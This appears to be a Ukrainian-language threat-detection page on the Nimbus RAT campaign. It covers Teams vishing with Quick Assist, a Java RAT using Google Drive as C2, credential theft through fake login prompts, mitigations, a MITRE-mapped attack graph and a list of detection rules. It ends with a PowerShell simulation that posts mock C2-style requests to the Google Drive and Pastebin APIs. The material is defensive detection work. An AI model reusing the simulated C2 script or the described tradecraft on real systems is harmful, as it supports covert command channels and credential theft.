Стежити 
Detection stack
- AIDR
- Alert
- ETL
- Query
Резюме
Зловмисники використовували фішинг голосовими повідомленнями в Microsoft Teams разом із Quick Assist, щоб розгорнути троян віддаленого доступу на основі Java, відомий як Nimbus RAT. Шкідливе ПЗ використовує Google Drive і Google Sheets як канали командування та контролю і містить OpenJDK runtime. Для крадіжки облікових даних використовує або підроблене сповіщення безпеки Windows, або CredUI API для захоплення секретних даних користувача.
Розслідування
Підрозділ реагування на загрози eSentire відтворив повний ланцюг вторгнення, використовуючи журнали потоку пошти, телеметрію кінцевих точок і статичний аналіз Java шкідливого ПЗ. Кампанія комбінувала бомбардування електронною поштою, вішинг-дзвінок у Teams, дистанційну підтримку Quick Assist, інструкції, розміщені на Pastebin, та зламаний клієнт SharePoint, що використовувався для розповсюдження корисного навантаження.
Захист
Рекомендовані заходи захисту включають вимкнення зовнішніх повідомлень з Teams від невідомих клієнтів, блокування Quick Assist, де це не потрібно, попередження про збільшення активності бомбардування електронною поштою, моніторинг javaw.exe виконання з незвичних місць і виявлення підозрілих викликів API Google Drive, ініційованих неочікуваними процесами.
Реакція
Якщо виявлено діяльність Nimbus RAT, ізолюйте уражену систему, припиніть усі пов’язані javaw.exe процеси, видаліть C:ProgramDataInboxCorePro каталог та будь-які пов’язані ярлики запуску і розгляньте можливість повної перевстановлення системи. Також перегляньте журнали аудиту Google Workspace, щоб виявити будь-які неавторизовані надання доступу до додатків Google Drive.
graph TB %% Оголошення класів classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef malware fill:#ff9999 classDef process fill:#ccccff classDef data fill:#e6e6e6 %% Вузли – дії action_phishing[“<b>Дія</b> – <b>T1566.003 Фішинг: цільовий фішинг через сервіс</b><br/>Масове надсилання електронних листів із підтвердженням підписки, що готує подальший вішинг-дзвінок у Microsoft Teams”] class action_phishing action action_trusted_rel[“<b>Дія</b> – <b>T1199 Використання довірених відносин</b><br/>Зловмисник створює тимчасовий Microsoft 365 tenant або компрометує легітимний для надсилання довірених зовнішніх повідомлень у Teams”] class action_trusted_rel action action_user_exec_file[“<b>Дія</b> – <b>T1204.002 Виконання користувачем: шкідливий файл</b><br/>Жертву через Pastebin спрямовують завантажити ZIP із компрометованого SharePoint та запустити JAR через javaw.exe”] class action_user_exec_file action action_user_exec_copy[“<b>Дія</b> – <b>T1204.004 Виконання користувачем: шкідливе копіювання</b><br/>Зловмисник вставляє URL Pastebin у чат Teams, змушуючи користувача перейти за посиланням”] class action_user_exec_copy action action_persistence[“<b>Дія</b> – <b>T1547.001 Автозапуск при завантаженні/вході</b><br/>Персистентність досягається через імпорт .reg файлу та створення ярлика в папці автозапуску для запуску Java RAT”] class action_persistence action action_credential_harvest[“<b>Дія</b> – <b>T1056.002 Перехоплення вводу: GUI</b><br/>Nimbus RAT відображає фальшиве Java Swing вікно входу та Windows CredUI для викрадення облікових даних”] class action_credential_harvest action action_c2[“<b>Дія</b> – <b>T1102.002 Вебсервіс: двосторонній зв’язок</b><br/>C2 через Google Drive з використанням service account або OAuth2 та зашифрованих polling-файлів”] class action_c2 action action_exfil[“<b>Дія</b> – <b>T1567.002 Витік через вебсервіс</b><br/>Зібрані дані (скриншоти, файли) завантажуються у ту саму папку Google Drive, що використовується для C2”] class action_exfil action action_network_disc[“<b>Дія</b> – <b>T1016 Виявлення мережевої конфігурації</b><br/>RAT виконує команди на кшталт ipconfig /all для збору мережевої інформації”] class action_network_disc action %% Інструменти / шкідливе ПЗ / процеси / файли tool_email_bomb[“<b>Інструмент</b> – Назва: скрипт email-бомбардування”] class tool_email_bomb tool tool_teams[“<b>Інструмент</b> – Назва: Microsoft Teams (вішинг)”] class tool_teams tool tool_sharepoint[“<b>Інструмент</b> – Назва: скомпрометований SharePoint сайт”] class tool_sharepoint tool malware_nimbus[“<b>Шкідливе ПЗ</b> – Назва: Nimbus RAT (Java)”] class malware_nimbus malware file_jar[“<b>Файл</b> – Назва: InboxCorePro.jar (Java payload)”] class file_jar data process_javaw[“<b>Процес</b> – Назва: javaw.exe (запуск JAR)”] class process_javaw process file_reg[“<b>Файл</b> – Назва: імпорт реєстру .reg”] class file_reg data file_startup[“<b>Файл</b> – Назва: ярлик у папці автозапуску”] class file_startup data service_gdrive[“<b>Сервіс</b> – Назва: Google Drive (C2 та ексфільтрація)”] class service_gdrive data process_ipconfig[“<b>Процес</b> – Команда: ipconfig /all”] class process_ipconfig process %% Зв’язки action_phishing –>|використовує| tool_email_bomb action_phishing –>|призводить_до| action_trusted_rel action_trusted_rel –>|використовує| tool_teams action_trusted_rel –>|доставляє| action_user_exec_copy action_user_exec_copy –>|надає_посилання_на| action_user_exec_file action_user_exec_file –>|завантажує_з| tool_sharepoint action_user_exec_file –>|виконує| file_jar file_jar –>|виконується_через| process_javaw process_javaw –>|запускає| malware_nimbus malware_nimbus –>|створює| action_persistence action_persistence –>|імпортує| file_reg action_persistence –>|розміщує| file_startup malware_nimbus –>|збирає| action_credential_harvest malware_nimbus –>|комунікує_з| service_gdrive service_gdrive –>|підтримує| action_c2 service_gdrive –>|підтримує| action_exfil malware_nimbus –>|виконує| action_network_disc action_network_disc –>|виконує_команду| process_ipconfig
Потік атаки
Виявлення
Виконання Java додатків з підозрілих місць (через створення процесу)
Перегляд
Підозрілі двійкові файли/скрипти у місцях автозапуску (через файл-події)
Перегляд
Можливий домен GoogleApis вирішується відомим зловживаним процесом (через запит DNS)
Перегляд
Можлива активність комунікаційного та контрольного утиліти Google (через проксі)
Перегляд
Ідентифікатори (HashSha256) для виявлення: Nimbus RAT: як загрозливі суб’єкти зловживають Microsoft Teams і Google Drive для розгортання Java RAT
Перегляд
Виявлення підозрілого використання Google API та Pastebin [Проксі]
Перегляд
Виявлення виконання Nimbus RAT через javaw.exe та команди розвідки [Створення процесу Windows]
Перегляд
Виконання Quick Assist і regedit.exe у вішинг атаці [Журнал безпеки подій Microsoft Windows]
Перегляд
Виконання симуляції
Передумова: Перевірка телеметрії та базового масштабу повинна бути пройдена.
Пояснення: У цьому розділі вказано точне виконання техніки супротивника (TTP), розробленої для виклику правила виявлення. Команди та наратив мають безпосередньо відображати визначені TTP та націлюватись на створення точної телеметрії, яку очікує логіка виявлення.
-
Сценарій нападу та команди:
Зловмисник вже скомпрометував кінцеву точку з бінарним файлом Nimbus RAT. Щоб встановити прихований канал C2, RAT видає два вихідні запити HTTP POST:- Виклик API Google Drive – завантажує невеликий JSON корисний вантаж до
https://www.googleapis.com/drive/v3/files?uploadType=media, імітуючи поведінку ‘завантаження корисного вантажу’ RAT. - Вставка в Pastebin – розміщує базове-64-кодовану команду у
https://pastebin.com/api/api_post.phpвикористовуючи публічний API ключ.
Обидва запити виконуються через PowerShell з
Invoke-WebRequest, щоб забезпечити наявність у журналах брандмауера полядомен(googleapis.comandpastebin.com). Атакуючий виконує команди у контексті скомпрометованого користувача, щоб змішатися з нормальною активністю. - Виклик API Google Drive – завантажує невеликий JSON корисний вантаж до
-
Скрипт перевірки регресії:
# -------------------------------------------------------------- # Презентація C2 Nimbus RAT – викликає Sigma правило на відповідність домену # -------------------------------------------------------------- # 1. Mock upload API Google Drive (без авторизації – фокус на телеметрії домену) $googlePayload = @{ name = "dummy.txt"; mimeType = "text/plain" } | ConvertTo-Json $googleUri = "https://www.googleapis.com/drive/v3/files?uploadType=media" try { Invoke-WebRequest -Uri $googleUri -Method POST -Body $googlePayload ` -ContentType "application/json" -UseBasicParsing -ErrorAction Stop Write-Host "[+] Надіслано mock upload до API Google Drive" } catch { Write-Warning "Запит Google Drive не вдався (ожидається у пісочниці): $_" } # 2. Публікація через публічний API Pastebin (вимагає розробницький ключ – використовується заглушка) $pastebinKey = "YOUR_PUBLIC_API_KEY" # <-- замінити на валідний ключ для реального тесту $pastebinText = "echo 'Симулятивна команда від C2'" $pastebinUri = "https://pastebin.com/api/api_post.php" $pastebinBody = @{ api_dev_key = $pastebinKey api_option = "paste" api_paste_code = $pastebinText api_paste_private = "1" } try { Invoke-WebRequest -Uri $pastebinUri -Method POST -Body $pastebinBody ` -ContentType "application/x-www-form-urlencoded" -UseBasicParsing -ErrorAction Stop Write-Host "[+] Надіслано макетну команду на Pastebin" } catch { Write-Warning "Запит Pastebin не вдався (очікується в пісочниці): $_" } # -------------------------------------------------------------- # Кінець симуляції # -------------------------------------------------------------- -
Команди очистки:
# Видалити будь-які тимчасові файли або змінні, що використовувались під час симуляції Remove-Variable -Name googlePayload, googleUri, pastebinKey, pastebinText, pastebinUri, pastebinBody -ErrorAction SilentlyContinue Write-Host "[*] Очищення завершено."